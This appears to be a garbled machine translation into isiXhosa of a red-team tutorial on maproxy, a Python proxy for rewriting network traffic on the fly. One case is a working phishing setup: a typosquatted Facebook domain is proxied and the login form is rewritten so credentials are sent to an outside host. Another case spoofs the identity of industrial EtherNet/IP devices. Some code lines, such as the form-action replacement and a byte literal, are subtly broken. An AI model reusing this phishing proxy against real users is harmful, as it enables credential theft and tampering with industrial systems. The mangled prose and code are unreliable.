Ukuguqulelwa kwenqaku kwalungiselelwa kwangaphambi kokuqalisa kwekhosi .
Abstract
Iindidi ezahlukeneyo zovavanyo lokhuseleko, ukusuka kuvavanyo lokungena rhoqo kunye nokusebenza kweQela eliBomvu ukuya kuqhekezo lwezixhobo ze-IoT / ICS kunye ne-SCADA, kubandakanya ukusebenza kunye neeprotocol zenethiwekhi yebhinari, oko kukuthi, ukuthintela kunye nokuguqula idatha yenethiwekhi phakathi komxhasi kunye nethagethi. Ukufunxa i-traffic yenethiwekhi ayingomsebenzi onzima kuba sinezixhobo ezifana ne-Wireshark, i-Tcpdump okanye i-Scapy, kodwa ukuguqulwa kubonakala kungumsebenzi onzima kakhulu kuba kuya kufuneka sibe nohlobo oluthile lojongano lokufunda idatha yenethiwekhi, ukuyihluza, ukutshintsha. it on the fly kwaye uyithumele emva kumamkeli ekujoliswe kuwo phantse ngexesha lokwenyani. Ukongeza, kuya kulunga ukuba isixhobo esinjalo sinokusebenza ngokuzenzekelayo ngoqhagamshelo olunxuseneyo oluninzi kwaye lube nokwenziwa kusetyenziswa izikripthi.
Ngenye imini ndafumanisa isixhobo esibizwa , amaxwebhu akhawuleza ayenza yacaca kum loo nto maproxy – kanye endikufunayo. Le yi-proxy ye-TCP elula, eguquguqukayo kwaye eqwalaselwe ngokulula. Ndivavanye esi sixhobo kwizicelo ezininzi ezintsonkothileyo, kubandakanya izixhobo ze-ICS (ezenza iipakethi ezininzi) ukubona ukuba zinokuphatha unxibelelwano oluninzi oluhambelanayo, kwaye isixhobo sisebenze kakuhle.
Eli nqaku liza kukwazisa ukuba usebenze idatha yenethiwekhi ngokubhabha usebenzisa maproxy.
isishwankathelo
Isixhobo maproxy isekwe kwiTornado, isakhelo sothungelwano esidumileyo nesivuthiweyo kwiPython.
Ngokubanzi, inokusebenza ngeendlela ezininzi:
TCP:TCP-Unxibelelwano lweTCP olungafihlwanga;TCP:SSLиSSL:TCP– ngoguqulelo oluntsonkothileyo lwendlela enye;SSL:SSL– indlela ezimbini ufihlo.
Iza njengethala leencwadi. Ukuqala ngokukhawuleza, ungasebenzisa umzekelo weefayile ezibonisa eyona nto iphambili :
all.pycertificate.pemlogging_proxy.pyprivatekey.pemssl2ssl.pyssl2tcp.pytcp2ssl.pytcp2tcp.py
I-Case 1 - i-proxy elula ye-bidirectional
Ngenxa ye tcp2tcp.py:
#!/usr/bin/env python
import tornado.ioloop
import maproxy.proxyserver
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()
Ukungagqibeki ProxyServer() ithatha iingxoxo ezimbini - indawo yoqhagamshelwano kunye nezibuko ekujoliswe kuzo. server.listen() ithatha impikiswano enye - izibuko lokumamela uxhulumaniso olungenayo.
Ukwenza iskripthi:
# python tcp2tcp.py
Ukuze uqhube uvavanyo, siza kuqhagamshela kwiseva ye-SSH yasekhaya ngeskripthi sethu sommeli, esimamela 2222/tcp izibuko kwaye iqhagamshela kwizibuko elisezantsi 22/tcp Iiseva ze-SSH:
Isibhengezo esamkelekileyo sikwazisa ukuba umzekelo wethu weskripthi uye wasebenza ngempumelelo kwitrafikhi yenethiwekhi.
Ityala 2 - ukuguqulwa kwedatha
Esinye iskripthi sedemo logging_proxy.py ilungele ukusebenzisana nedatha yenethiwekhi. Amagqabantshintshi kwifayile achaza iindlela zeklasi onokuthi uziguqule ukuze ufezekise injongo yakho:
Eyona nto inika umdla nantsi:
on_c2p_done_read-ukuthintela idatha endleleni ukusuka kumxhasi ukuya kumncedisi;on_p2s_done_read- iguqulwe.
Makhe sizame ukutshintsha ibhana ye-SSH umncedisi ayibuyisela kumxhasi:
[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]Phumeza iscript:
Njengoko ubona, umxhasi ulahlekisiwe kuba igama leseva ye-SSH yakhe latshintshwa laba «DumnySSH».
Ityala le-3 - iphepha lewebhu elilula lokukhohlisa
Kukho iindlela ezingapheliyo zokusebenzisa esi sixhobo. Ngeli xesha makhe sigxininise kwinto enokwenzeka ngakumbi kwicala lemisebenzi yeQela eliBomvu. Masixelise iphepha lokufika m.facebook.com kwaye usebenzise isizinda esilungiselelweyo ngochwethezo ngabom, umzekelo, m.facebok.com. Ngeenjongo zokubonisa, masicinge nje ukuba isizinda sibhaliswe sithi.
Siza kuseka unxibelelwano lwenethiwekhi olungafihlwanga kunye namaxhoba ethu ommeli kunye ne-SSL Stream kumncedisi we-Facebook (31.13.81.36). Ukwenza lo mzekelo usebenze, kufuneka sitshintshe i-header host ye-HTTP kwaye sifake igama lomninimzi elichanekileyo, kwaye siya kukhubaza ucinezelo lwempendulo ukuze sikwazi ukufikelela ngokulula imixholo. Ekugqibeleni siya kuthatha indawo yefom ye-HTML ukuze iziqinisekiso zokungena zithunyelwe kuthi endaweni yeeseva zikaFacebook:
[…]
def on_c2p_done_read(self,data):
# replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
data = data.replace("action="/xh/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]Isishwankathelo:
Njengoko ubona, sikwazile ngempumelelo ukubuyisela indawo yokuqala.
Ityala le-4 - Ukuthuthwa kwe-Ethernet / IP
Bendisebenza nezixhobo zoshishino kunye nesoftware (i-ICS/SCADA) ixesha elide, njengabalawuli abanokucwangciswa (PLC), iimodyuli ze-I/O, iimodyuli, ii-relays, i-ladder programming environments kunye nezinye ezininzi. Eli tyala lelabo abathanda izinto zamashishini. Ukukhwabanisa izisombululo ezinjalo kubandakanya ukudlala ngokusebenzayo kunye neeprothokholi zenethiwekhi. Kulo mzekelo ulandelayo, ndingathanda ukubonisa indlela onokuguqula ngayo i-ICS / SCADA i-traffic network.
Ukwenza oku uya kufuna oku kulandelayo:
- I-Network sniffer, umzekelo, i-Wireshark;
- I-Ethernet / IP okanye nje isixhobo se-SIP, ungayifumana usebenzisa inkonzo ye-Shodan;
- Umbhalo wethu usekwe kwi
maproxy.
Okokuqala, makhe sijonge ukuba injani na impendulo yokuchonga evela kwi-CIP (iProtokholi yoShishino oluQhelekileyo) ijongeka njani:
Ukuchongwa kwesixhobo kufezekiswa kusetyenziswa i-Ethernet/IP protocol, eyinguqulelo ephuculweyo yeprotocol ye-Ethernet yoshishino esonga iiprothokholi zolawulo ezifana neCIP. Siza kutshintsha igama le-ID elikhankanyiweyo elibonakalayo kwiscreenshot "NI-IndComm ye-Ethernet" usebenzisa iskripthi sethu sommeli. Singaphinda sisebenzise umbhalo logging_proxy.py kwaye ngokufanayo uguqule indlela yeklasi on_p2s_done_read, kuba sifuna ukuba igama lesazisi elahlukileyo libonakale kumxhasi.
Ikhowudi:
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
# Checking if we got List Identity message response
if data[26:28] == b'x0cx00':
print('Got response, replacing')
data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]
Ngokusisiseko, sicele ukuchongwa kwesixhobo kabini, impendulo yesibini yayiyeyokuqala, kwaye eyokuqala yalungiswa ngokubhabha.
Kwaye okokugqibela
Kwiingcinga zam maproxy Isixhobo esifanelekileyo nesilula, esikwabhalwe kwiPython, ke ndiyakholelwa ukuba nawe unokuzuza ngokuyisebenzisa. Ngokuqinisekileyo, kukho izixhobo ezinzima kakhulu zokucubungula kunye nokuguqula idatha yenethiwekhi, kodwa zifuna ingqwalasela engakumbi kwaye ngokuqhelekileyo zidalwe kwimeko ethile yokusetyenziswa, umz. , okanye kwiimeko ezifanayo neyesithathu, okanye kwimeko yokugqibela. Enye indlela okanye enye, ngoncedo maproxy unokuphumeza ngokukhawuleza iimbono zakho zokuthintela idatha yenethiwekhi, kuba umzekelo wezikripthi zicace kakhulu.
umthombo: www.habr.com